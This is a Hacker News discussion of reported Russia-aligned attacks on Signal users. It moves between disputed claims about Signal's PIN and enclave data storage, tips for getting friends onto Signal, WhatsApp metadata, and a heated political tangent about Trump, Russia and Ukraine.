You can't make that statement blindly without knowledge of the entire cryptosystem and threat model. For example, to me, an encrypted version of my email address, as used by many ad networks to do retargeting, is still sensitive information if it lets Walmart serve me ads based on my Google search history.
  • loufe
  • ·
  • 1 day ago
  • ·
  • [ - ]
I'm a big signal user yet skeptical that it's not directly involved with intelligence agencies. That's all to say, this sounds like FUD but I think it should be taken seriously. Out of curiosity, where have you read this?
It was a bit of a controversy when the change happened:

see https://web.archive.org/web/20210109010728/https://community...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

Note that the "solution" of disabling pins mentioned at the end of the article was later shown to not prevent the collection and storage of user data. It was just giving users a false sense of security. To this day there is no way to opt out of the data collection.

Obligatory request to provide a source to backup some serious claims?
If you're a signal user and didn't know about this already, that should tell you everything you need to know about signal.

See https://community.signalusers.org/t/proper-secure-value-secu...

Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)

Signal loves to brag about the times when the government came to them asking for information only to get turned away because Signal never collected any data in the first place. They still brag about it. It hasn't actually been true for years though. Now they're collecting the exact info the government was asking for and they're protecting that data with a not-very-secure/likely backdoored enclave on the server side, and (even worse) a pin on the client side.

  • alwa
  • ·
  • 1 day ago
  • ·
  • [ - ]
I see a link to a forum where an anonymous participant says

“Since a recent version of Signal data of all Signal users is uploaded to Signal’s servers. This includes your profile name and photo, and a list of all your Signal-contacts.”

They then link to a Signal blog (2019) explaining technical measures they were testing to provide verifiably tamperproof remote storage.

https://signal.org/blog/secure-value-recovery/

I’m not equipped to assess the cryptographic integrity of their claims, but 1) it sounds like you’re saying that they deployed this technology at scale, and 2) do you have a basis to suggest it’s “not-very-secure or likely backdoored,” in response to their apparently thoughtful and transparent engineering to ensure otherwise?

The communication Signal put out was extremely confusing and unclear which caused a lot of issues. They avoided answering questions about the data being collected and instead focused everything on SVR (see https://old.reddit.com/r/signal/comments/htmzrr/psa_disablin...)

The problems with the security of Signal's new data collection scheme was talked about at the time:

https://web.archive.org/web/20210126201848mp_/https://palant...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

You'll have to decide for yourself how secure pins and enclaves are, but even if you thought they were able to provide near-perfect security I would argue that outright lying to highly vulnerable users by saying "Signal is designed to never collect or store any sensitive information." on line one of their privacy policy page is inexcusable and not something you should tolerate in an application that depends on trust.

> 2) do you have a basis to suggest it’s “not-very-secure or likely backdoored,” in response to their apparently thoughtful and transparent engineering to ensure otherwise?

The forum post explains this:

> This data is encrypted by a PIN only the user can know, however users are allowed to create their own very short numeric PIN (4 digits). By itself this does not protect data from being decrypted by brute force. The fact that a slow decryption algorithm must be used, is not enough to mitigate this concern, the algorithm is not slow enough to make brute forcing really difficult. The promise is that Signal keeps tge data secured on their servers within a secure enclave. This allows anyone to verify that no data is taken out of the server, also not by the Dignal developers themselfs, not even if they get a subpoena. At least that is the idea.

> It is also not clear if a subpoena can force Signal to quietly hand over information which was meant to stay within this secure enclave.

That should be very concerning for activists/journalists who use Signal to maintain privacy from their government. Subpoena + gag order means the data is in the hands of the government, presuming Signal want to keep offering their services to the population of the country in question.

I wanted to add that there is the cease and desist case against Signal-FOSS fork that tried to implement an open server, too.

In my opinion Briar is where it's at, but because there's no data collection it's pain to do a handshake or manage contacts.

Signal-FOSS is still around right? Got a link to some of the drama? I'm curious to see what their grounds were. Did they just object to the use of their name?
There is still Molly as a fork, but no idea how hardened it actually is.

After Moxie's statement at the time I kind of ditched everything regarding Signal's ecosystem. I understand the business perspective of it, but it's kind of pointless trying to say this is open source when it's illegal to press the Fork button on GitHub, you know.

https://github.com/mollyim/mollyim-android

Sounds quite fishy :( . Any specific proofs in addition to all what have been said so far? I've checked the links, they don't really prove anything...
here are links to additional discussions from the time of the change: https://community.signalusers.org/t/mandatory-pin-is-signal-...

One of the few articles that talked about it at the time: https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

One of the many reddit posts by confused users who misunderstood the very unclear communications by Signal: https://old.reddit.com/r/signal/comments/htmzrr/psa_disablin...

Also signals spam folder isn't open source on server side. They literally have code that reads your messages and checks if spam or not and you cant see what it does or how it's written.

Couple this with signal being the preferred messaging app for 5 eyes countries as advised by their 3 letter agencies and well if you think those agencies are going to be advising a comms form they can't track, trace or read you obviously don't understand what they do.

  • alwa
  • ·
  • 1 day ago
  • ·
  • [ - ]
While it seems to be true that it’s not open-source, they claim (in strong terms) that they use techniques other than reading the message to make that assessment:

https://signal.org/blog/keeping-spam-off-signal/

They point out that the protocol’s end-to-end cryptographic guarantees are still open and in place, and verifiable as ever. As far as I can tell, they claim that they combine voluntary user spam reports and metadata signals of some sort:

> When a user clicks “Report Spam and Block”, their device sends only the phone number that initiated the conversation and a one-time anonymous message ID to the server. When accounts are repeatedly reported as spam or network traffic appears to be automated, we can issue “proof of humanity” checks to suspicious senders so they can’t send more messages until they’ve completed a challenge. For example, if you exceed a configured server-side threshold for making requests to Signal, you may need to complete a CAPTCHA within the Signal application before making more requests. This approach slows down spammers while allowing regular messages to continue to flow.

Does that seem unreasonable? Am I missing places where people have identified flaws in the protocol?

  • ·
  • 1 day ago
  • ·
  • [ - ]
Can you elaborate? I'm semi-familiar with the Signal protocol but I'm not sure what you are referring to here.
See https://community.signalusers.org/t/proper-secure-value-secu...

Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)

I was going to discount most of this. It appears this link is missing or private now. What did it say?
fixed the link. Just to be safe, here's an archive of the page: https://web.archive.org/web/20210109010728/https://community...
Last week it was Microsoft, now Signal, who’s next?

https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...

I hate to break it to you, but threat actors aligned with any major state are targeting everything with an Internet presence all of the time.
Can't view the article, as I am an evil Tor user.
Me too, but I was able to access the article through the Internet Archive:

https://web.archive.org/web/20250219202428/https://cloud.goo...

  • ·
  • 1 day ago
  • ·
  • [ - ]
“Russia's re-invasion of Ukraine”

Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?

Invasion of Crimea 2014

Re-invasion in February 2022

Signal should be doing something well.
  • ·
  • 1 day ago
  • ·
  • [ - ]
Phone verification is a common method used here.

If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.

It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.

> government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device

Yes, but if they only control the phone number, you they will register a new account (different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your Safety Number with Bob changed" message.

  • ge96
  • ·
  • 1 day ago
  • ·
  • [ - ]
that's nice they provided a list of bad domains
  • ·
  • 1 day ago
  • ·
  • [ - ]
  • Yeul
  • ·
  • 1 day ago
  • ·
  • [ - ]
Honestly don't use Signal for privacy or anonymity. I switched to it because it is not owned by a sycophant of Trump.

Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.

"Russia-aligned threat actors" has a whole new meaning this last week.
I wonder if someone in the US will declare that, actually, Signal is actively targeting the Russia-aligned threat actors.
Or that Signal shouldn't have started it in the first place
Indeed. It now potentially includes a very long list of Americans.
What does that mean?
Trump and his voters.
Not sure why hating Russia should be treated as axiomatic.
[dead]
What difference does that make? More people being openly malicious doesn't make them right.
He also failed to secure a majority of the votes cast, winning with a mere plurality. (Not that the raw number of votes cast actually matters all that much, given our idiotic presidential electoral system.)

So what?

Totally agreed that it's out of bounds to label all Trump voters as rednecks & white nationalists. But not sure where you're getting that: read upthread. No one said anything like that. Just "Russia-aligned state actors". Which is also pretty silly.

But in a way, it's worse than all that. If his supporters were actually all rednecks & white nationalists (or Russia-aligned state actors), at least we could say, "well, the country is actually full of shitty, uneducated, racist people, so I guess this actually is the will of the people". But right, that's not the case. Instead, Trump and the GOP have lied and manipulated to the point they've managed to dupe a much more diverse group of people into believing in Trump. Or, at the very least, into believing that the system needs to burn in order for it to be remade in a way that will serve these people's interests.

All this is a crock, of course, and there are already quite a few surprised and upset Trump voters who have experienced an interruption or loss of some government service that they depend on. So ok, let's expand it the list. Sure, there are rednecks & white nationalists. But there are also just regular ol' idiots who fell for Trump's nonsense. And actively awful people who are fine with a lot of others getting hurt, just to spite the current establishment.

They are still all trumpis now.
Nobody labeled Trump voters as "redneck, white nationalists" in this thread. The claim was that Trump and his voters are "Russia-aligned", which is obvious at least for Trump and his immediate admin appointees.
I don't have opinions on most of this stuff but I know of some distant relative of mine who voted for Trump not because he's some sort of fascist but just because he didn't understand why voting for Trump maybe wasn't the best idea. People like this probably exist all over the place.
  • ·
  • 1 day ago
  • ·
  • [ - ]
[flagged]
>This comment isn't witty, and it doesn't contain any useful information or promote discussion either.

Complaining about the comment isn't witty, contain useful information, or promote discussion either.

I would recommend being the change you want to see in the world (or avoid political threads).

I strongly agree - HN has become increasingly Redditified in the political discussion sense. I think this website has the potential to have (and often already has) some of the best serious discussion on the internet, so it really nags at me that people have eroded this standard a lot recently IMO.
Sorry that you are so inconvenienced by the Russian coup of the US.
[flagged]
[flagged]
Only that the President is now trotting out lines created by the Kremlin's propaganda machine.
They are saying that the USA is potentially a Russia-aligned threat actor.
Try to open news about USA-Russia latest talks. Basically Trump now is repeating propaganda topics from Russia Today, their fake claims about Ukraine.

USA pushed Ukraine to give up nukes, offered security assurances instead. And then during full scale war donated just 30 old tanks. And now Trump is talking with Putin behind Ukraine's back on how they should surrender.

Unfortunately USA is not a superpower anymore and their word means nothing.

> Unfortunately USA is not a superpower anymore and their word means nothing.

I wish this were true, and while Mr. Trump has dedicated himself to ripping up the world order, the US still has way too many nukes to not treat as a substantial power.

If the US isn't a superpower, I'm not sure there are any superpowers left.

Trump blames Ukraine for starting the war, Putin is happy
I heard he also blames Poland for being invaded and starting WWII. As to that Archduke Ferdinand, diving in front of that bullet. Was asking for it.
> I heard he also blames Poland for being invaded and starting WWII.

This one is fake, even if plausible. https://www.der-postillon.com/2025/02/ueberfall-auf-polen.ht... - Der Postillon is equivalent to US's The Onion.

The person you replied to was joking, but it makes it even funnier that you didn't think they were.
As someone living in Poland and tracking the developments in the US, when I used the word "plausible", I meant it.
  • e40
  • ·
  • 1 day ago
  • ·
  • [ - ]
POTUS giving Putin just what he wants re Ukraine. Ronald Reagan is spinning in his grave at near light speed, I imagine.
[flagged]
I though5 drugs were illegal where you come from.. cuz you smokin' some bad shit, blyat.
[flagged]
boo
tldr: they mostly use phishing with fake ukrainian army group invites to trick people (from ukrainian army) to link the phone device to a attacker-controlled PC.

Also they try to get the actual database SQL files from Windows devices and Android devices.

  • ·
  • 1 day ago
  • ·
  • [ - ]
I'd love to have more of my socializing happening on Signal. Anyone got a good way to convince the non-paranoid to use it?
"Sorry, I only use Signal" has worked nearly a decade for me
Virtue Signalling!
Which is bad, how?
It's a joke, because virtue signaling (or whatever name you want to give it) is bad, but Signal the messenger app is good so it's a play on words.
It’s not bad. It just IS.

the only people that think it is bad are people who have a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling because it is almost always someone who is jealous or insecure attacking said signaler.

"Virtue signaling" in theory means "talking the talk without walking the walk", but it's generally thrown out by people who make no effort to assess whether the person criticized is walking the walk or even in contradiction of such evidence.

Driving an economically efficient car -- choosing any sort of car -- has enormous consequences on one's life, for example. Choosing to by a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.

In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, say, belief in anthropogenic climate change, or peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.

In other words, in my experience your observation is spot on.

> "Virtue signaling" in theory means "talking the talk without walking the walk"

Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.

  • ·
  • 1 day ago
  • ·
  • [ - ]
What if you need to contact someone and they use whatsapp?
  • croes
  • ·
  • 1 day ago
  • ·
  • [ - ]
What if they want to contact you and you use Signal?
Luckily, with the technological advances in the last months, it is now possible to install more than one app on a phone at a time.
It is also possible to communicate without using Meta services.
Good luck with that depending on where you live.
And when you live. The 20s-30s year old crowd I interact with seems to avoid, if not mock FB. I recognize it has its uses and benefits, though.
They mock fb whilst they use instagram and WhatsApp.
> it is now possible to install more than one app on a phone at a time.

And, in doing so, achieve the security posture of the worse of the apps!

IME you say “Sorry I only use Signal” and either they change or you don’t get in contact with that person.

If you change and abandon your principles were they really principles in the first place?

[flagged]
How do you tell that to them in the first place? You got someone's phone number. The person who gives it to you tells them that they use whatsapp. You can't even tell them "Sorry I only use Signal" unless you open whatsapp app.
You realise you could use that phone number to...call them and let them know? Also - in what situation are they giving you a phone number and telling you they use WhatsApp but you having no way to respond when receiving that info? If it's in person you can explain at the time. If it's taken from a website, call them. Or you can even fall back on SMS.
Presumably at the time they've given you their phone number, they've told you that they are on WhatsApp, and then you've responded directly that you're only on Signal.

If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.

If they can't reach you via whatsapp, they will call you.
Not GP - I tolerate Whatsapp but I draw the line at SMS.
For me it's the other way around: I tolerate SMS but I draw the line at Whatsapp.
Sounds like someone who never had to pay for each SMS.
RCS?
If you really really really need to? You use Whatsapp.

If you don't need to? You tell them to get Signal.

You call them. Or use SMS. Or use e-mail.
same
  • rakoo
  • ·
  • 1 day ago
  • ·
  • [ - ]
Take time with the people to do the boring stuff on their phone/computer:

- install [the thing]

- start it, show how it works

- search for yourself, start a convo, exchange messages

- add them to the group

IME the friction comes from having to do the first step, because it's really an annoyance no one cares about, so if you take it for yourself and do it they'll like that

I usually tell people, "It's like iMessage, but it works on iPhone and Android," or "Hey, if you download Signal we can send high-quality photos between Android and iPhone."
My (non-technical) Mom actually got my whole extended family on Signal with a group link. Since there's no real account creation it was painless. It's how we do all video calls/photo sharing/chat now.
I helped an especially non-technical user install Signal and they didn't need my help at all. They were using it in a minute - download from the app store, transcribe a code from a text message, and you're in - and it worked just like legacy text and phone.

I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.

To be clear, someone will/can track WHO you talk to. Right?
My understanding is that they can/do on WhatsApp.

On Signal, unless there is a some bug or outright fraud, afaik they cannot - that is one of their fundamental goals, and they did a lot of work to develop communication technology that worked without revealing that metadata.

(Of course, if someone gets access to your phone, then they know who you are talking to.)

That kind of meta data is not stored by signal as far as I know. But yes, data stream between two end points can be linked to communicating with each other.
  • jaza
  • ·
  • 1 day ago
  • ·
  • [ - ]
I've still got Signal installed, but never use it, I only ever ended up chatting on it with a few ex-colleagues, who were fellow devs / nerds.

I have so many WhatsApp group chats (here in Australia) that are critical for me these days, and that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents group chats (one for each class that my kids are in). Strata (aka Home Owners Association) committee group chat. Scouts group chat. Various friends groups chats. Boycotting WhatsApp is not an option for me, it would literally make me unable to function in a number of my day-to-day responsibilities.

Group stories are great fun and a feature I seriously miss on Whatsapp. They work well from meme chats to family groups.

There being a killer feature that Whatsapp users are missing out on won't convince everyone but it sure makes me feel less like a nerd when encouraging the switch to Signal.

I find it quite funny that such an obvious feature likely hasn't been added to Whatsapp yet because Meta thinks Instagram is for stories. That's pure speculation on my part though

  • lcc
  • ·
  • 1 day ago
  • ·
  • [ - ]
I've had good luck just asking for it, even with group chats (though admittedly my friends are mostly technical and more privacy conscious than the average person). Usually it's a switch from FB Messenger and I just say that I don't want to be locked into Facebook anymore.
Just explain what end to end encryption means. People are starting to get it and don’t want companies able to read their messages.
Isn’t WhatsApp end-to-end encrypted?
Yes it is, they actually use the signal protocol,[0] but they collect metadata which Signal supposedly doesn't (you can't really know)

[0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=Severa...

Signal doesn't collect that data, but you have no reason to trust me on it.

Look at what data they can provide to governments when compelled by law: https://signal.org/bigbrother/

I thought they recorded the metadata - who talks to who and when. (For the uninitiated, that is as valuable or more valuable than the message contents.)
you also send them your contacts in plaintext so you can find who's also on WhatsApp; signal doesn't
  • ·
  • 1 day ago
  • ·
  • [ - ]
  • ·
  • 1 day ago
  • ·
  • [ - ]
https://www.reddit.com/r/privacy/comments/v7tsou/is_whatsapp...

It seems to be but there is more to it than that.

  • baq
  • ·
  • 1 day ago
  • ·
  • [ - ]
Nobody cares about this unless they deal drugs or something.

What some people care about is not giving all their private conversations to masculine energy zuck - but don't expect any major wins.

Awful shortsighted and uninformed viewpoint that has been beaten into the ground ad nauseum.

Read a couple books. Privacy is a precondition to democracy.

  • baq
  • ·
  • 1 day ago
  • ·
  • [ - ]
It isn't a viewpoint. It's a fact. I'm using signal for almost a decade now and only managed to get a dozen or so people to use it in any capacity. Most keep using whatsapp as their primary method of communication anyway.
Meanwhile, I have been using Signal since the TextSecure days, too, and practically all my contacts are using it these days.
  • baq
  • ·
  • 1 day ago
  • ·
  • [ - ]
Good for you, tell us how you did it!
  • lukan
  • ·
  • 1 day ago
  • ·
  • [ - ]
What books would you recommend, that proof that connection?

"Privacy is a precondition to democracy"

How would you convert an autocracy into a democracy without secrecy? There are no peaceful means so you have to plot.
  • lukan
  • ·
  • 1 day ago
  • ·
  • [ - ]
Secrecy and privacy is not really the same concept.
>Read a couple books

Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.

My Signal experience: ex gf in college asks what app I’m using to text. Tell her it’s Signal, E2EE, messages are only stored on her phone and nobody else can read them. She says cool and downloads the app. Four months later her phone breaks.

“Hey subjectsigma I got my new phone today. Where are all my messages?”

“… Do you have your old phone? That’s the only place they are.”

“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”

“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”

“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”

We have a long way to go, my friend.

It only works for WhatsApp if you have Backup to Google activated[1]. I once tried to work with backuped files from my old phone and it didn't work. (Older tutorials indicated that it once worked, though.)

[1] There was a time WhatsApp had a nag-screen if you hadn't Backup to Google activated. So I guess most people would have eventually caved.

That nag-screen is still there, it pops up roughly every three months for me (though not on my primary phone, Whatsapp won't get anywhere near that one).
[flagged]
[flagged]
[flagged]
I'm not going to run interference against all the comments you're writing on this thread, because I don't think Signal needs the help and it would make the thread ultra-tedious. But during the brief window where people were taking Wire seriously as a Signal alternative, I'd occasionally write a comment or tweet like:

Were you aware that Wire keeps a high-fidelity plaintext database of exactly who talks to who on their platform?

And people were reliably startled. But all that was happening was that ordinary users have no mental model for how a secure messenger is designed, and hadn't thought through how serverside contact lists that magically work no matter what device you enroll in the system were actually designed.

So here I'll just say: the stuff you're saying about Signal is pretty banal and uninteresting. The SGX+Enclave stuff is Signal's answer to something every other mainstream messenger does even worse than that. By all means, flunk them on their purity test!

Even if you thought that SGX was bulletproof and pins were impossible to brute force, instead of just being 'better than what most other apps use' what possible justification is there for outright lying to users by claiming that their app doesn't collect any sensitive data when it does?

Signal is advertised and recommended to some extremely vulnerable people whose lives/freedom depend on their security. Signal owes users a clear explanation of the risks that come from the use of their software so that whistleblowers, journalists, and activists can make informed choices. Lying to those users is disgusting.

Seen most charitably, the fact that the very first line of their privacy policy page is an outright lie might be intended as a dead canary to warn users away as loudly as they can, but even in that case I'll be happy to say it plainly: Signal shouldn't be trusted.

I think we know you're happy to say it plainly, since you've been saying it plainly for over 4 years.
This comes as news to me, and rather disappointing news at that. Do you have a source I can read further?
Several sources and links for more info. Check my profile for more, I don't want to spam the same links all over this topic, but I'd start here:

https://community.signalusers.org/t/proper-secure-value-secu...

https://web.archive.org/web/20210126201848mp_/https://palant...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

[dead]
[dead]
Russia fucking up the worlds stuff this decade will be the material for history books. The are actively breaking Europe and almost noone seems to care.
Second will be how the internet with social media like twitter/x destroyed our democracy.
If Europe is what it claims to be: an enlightened democracy with progressive intelligent populace it can not be broken by demented crap messages from twitter.

If however it is fucked up and on a brink of collapse then sure. Little nudge can steer it into "right" direction. but then who is guilty in a first place.

You should read up on how russian money buys influenve, eg. In Moldavia.
  • nomat
  • ·
  • 1 day ago
  • ·
  • [ - ]
the idea that propaganda doesn't work is certainly an interesting one.
That's part of the propaganda. Please ignore the Internet Research Agency's massive army of troll farms and bots. Please ignore that they controlled half of the largest American Facebook groups catering to racial identity or religion. Nothing to see and no impact.
Impossible these are our newly minted allies
Ok I laughed! :) But it's crazy if you think about it, isn't it?
New allies, same as the old allies.
So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
I'm not going to psychoanalyse the brain parasite, but I imagine that the reason to do it could be as petty as shadow banning people with Fediverse (e.g. mastodon) handles in their bios shortly after he took over.

Also:

> Signal has been a primary method of communication for federal workers looking to blow the whistle on DOGE. > from https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...

Btw, I don't live in the US but I sketched a simple tool to prevent X from censoring Signal.me links: https://link-in-a-box.vercel.app

Only signal.me links were blocked as far as I understood. Other signal links kept working. (I have no first hand knowledge as I left Twitter when the owner changed)
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
Not really, the domain block was reportedly due to increased spam activity from that domain and performed automatically, so it would follow that a write up would come a few days later. That is if they are related, which is not a given.
Musk calls everything he doesn't like "spam", so of course it was.
It’s still a social media platform, not every action taken is some nebulous part of Musks agenda. Odds are there was an influx of posts that qualify as spam from the signal.me domain that were marked by an automatic system as spam, because they were. Suggesting otherwise is baseless speculation.
Given that Musk has deliberately blocked links to whole other domains before for extremely petty reasons, I don't see why we should give him the benefit of the doubt.
>So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.

Not surprising considering Russian Oligarchs enabled Musk's takeover of Twitter:

https://www.dw.com/en/what-do-xs-alleged-ties-to-russian-oli...

[flagged]
[flagged]
  • ars
  • ·
  • 1 day ago
  • ·
  • [ - ]
[flagged]
[flagged]
[flagged]
[flagged]
The US was never the “hero,” you’re just not used to broad shifts in US policy broadcast so loudly. But this has happened numerous times in the past to other “allies.”
This is the glib over simplification he was complaining about with a haughty poorly informed statement

We have never done it with an ally this critical of this size with this level of investment. Yes we have done it with smaller, less critical nations very often and it is of coruse atrocious. In fact Sadam, Bin Ladin, and others were all originally our allies that we betrayed.

But we never did it against an aggressive nuclear power invading Europe.

> Sadam, Bin Ladin, and others were all originally our allies that we betrayed.

They were not allies, or not at all in the same sense. They were people the US did business with because of a common enemy, and then stopped doing business with when the situation changed. I don't think Saddam or Bin Laden thought for a moment that they were allies of the US, like Denmark and Japan are.

So you … agree? But are so set on disagreeing you frame it that way? Do you even listen to yourself?
True, but Europe has been relying on Russian oil for decades now, and the attempt to restrain the influence of Russia on European powers has become a great strain on the US. It pushed Russia closer to China and made it more likely that the US would get more involved in interminable proxy wars with a powerful eastern allience at the expense of its economic development. While I’m not a fan of Putin, I can’t see any strategic problems with the move.
[flagged]
[flagged]
Why would people give the most significant political events of this century so far "a rest"?
Because this thread is about a (potential) technological flaw in a communication app. It has nothing to do with the sitting US president.
The thread is about an attack by Russia on the app, which is American, and used by Americans and their allies. The President's policy toward those allies and Russia can have a substantial effect on whether Russia will risk attacking it or whether American security will protect Signal, its users, or its Ukrainian military users.
This has nothing to do with politics. Popping Signal is quaint because it's a channel, not at asset. You don't need to compromise the channel if you have alternate routes to acquire the assets.

edit: I will not reply further. What I said would be true regardless of the economic policy or partisan identification of the administration.

ahem...

``` The sitting US President is literally a Russian asset. He is directing his team to divide up a country that Russia invaded in a summit that is not including that country, and stealing a half trillion in their sovereign mineral wealth without their consent. Calling their president an incompetent dictator and claiming being invaded was somehow their fault. ```

[flagged]
[flagged]
Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
> US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago)

You can't be serious that you consider that to be a good enough reasoning.

Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.

> Zelensky defeated Poroshenko

And yet he still felt the need to start politically repressing Poroshenko with sanctions and branding him a traitor, that's the mark of having a dictator in command of things.

Maybe because Poroshenko is an oligarch and a piece of shit?
They're calling Zelensky a dictator because his term was originally scheduled to end in 2024 unless re-elected, and there were no elections since the beginning of the war.

The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.

Why are you repeating Kremlin's talking points?

Using the exact same reasoning, Churchill would be a dictator, too.

Highly likely...
Is this why twitter has been blocking signal.me links? https://news.ycombinator.com/item?id=43076710
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
  • ·
  • 1 day ago
  • ·
  • [ - ]
State-aligned, huh? This is the US State Department talking point equivalent of a movie poster that brags, "From the studio that brought you..."
Why is computer technology getting politicized - "Russia-aligned"... When Bulgarian gypsies commit crimes in Germany, let's say, the media is banned from revealing their ethnic background, and thus hurting the vast majority of Bulgarians directly and indirectly as the Germans have no idea that the thieves were gypsies, but it's okay to vilify a whole nation such as Russia - in movies, in the news, etc. Shame on you, "technologists" and "artists"!
It isn't that bad in the comment sections of German newspapers, where people are more open to diverse opinions. If a center right newspaper like "Die Welt" or "Focus" writes an anti Russian article, you can easily have 80% of 1000 comments demanding peace negotiations and ending the whole business. And they are real comments, because the German is so idiomatic with regional dialects that it would be hard to fake even for an AI.

Also in the Financial Times the comments sections can be split 50/50.

By the way, the excessive use of the "Russian hacker" meme has been a source of amusement in the German hacker scene even before 2022.

Bulgarian gypsies (what?) didn’t start a war against Germany, Nikolay.
It's the principle. Germans started the most destructive war in human history, but they are not vilified as much as the Russians!
  • twaKJ
  • ·
  • 1 day ago
  • ·
  • [ - ]
If Russia retreats from the occupied territories, heaps guilt on itself for the next 80 years and does not start new wars, it won't be vilified 80 years from now.

Also, of course, Germany and WW2 are mentioned constantly in Russia itself even today, while most new wars in the past 40 years have been started by the US or Russia.

What Germany did is many orders of magnitude worse than what Russia does in Ukraine. If you think both are similar, you have no heart, and possibly no brain either!
[dead]
  • nomat
  • ·
  • 1 day ago
  • ·
  • [ - ]
well for one they're targeting ukrainian soldiers..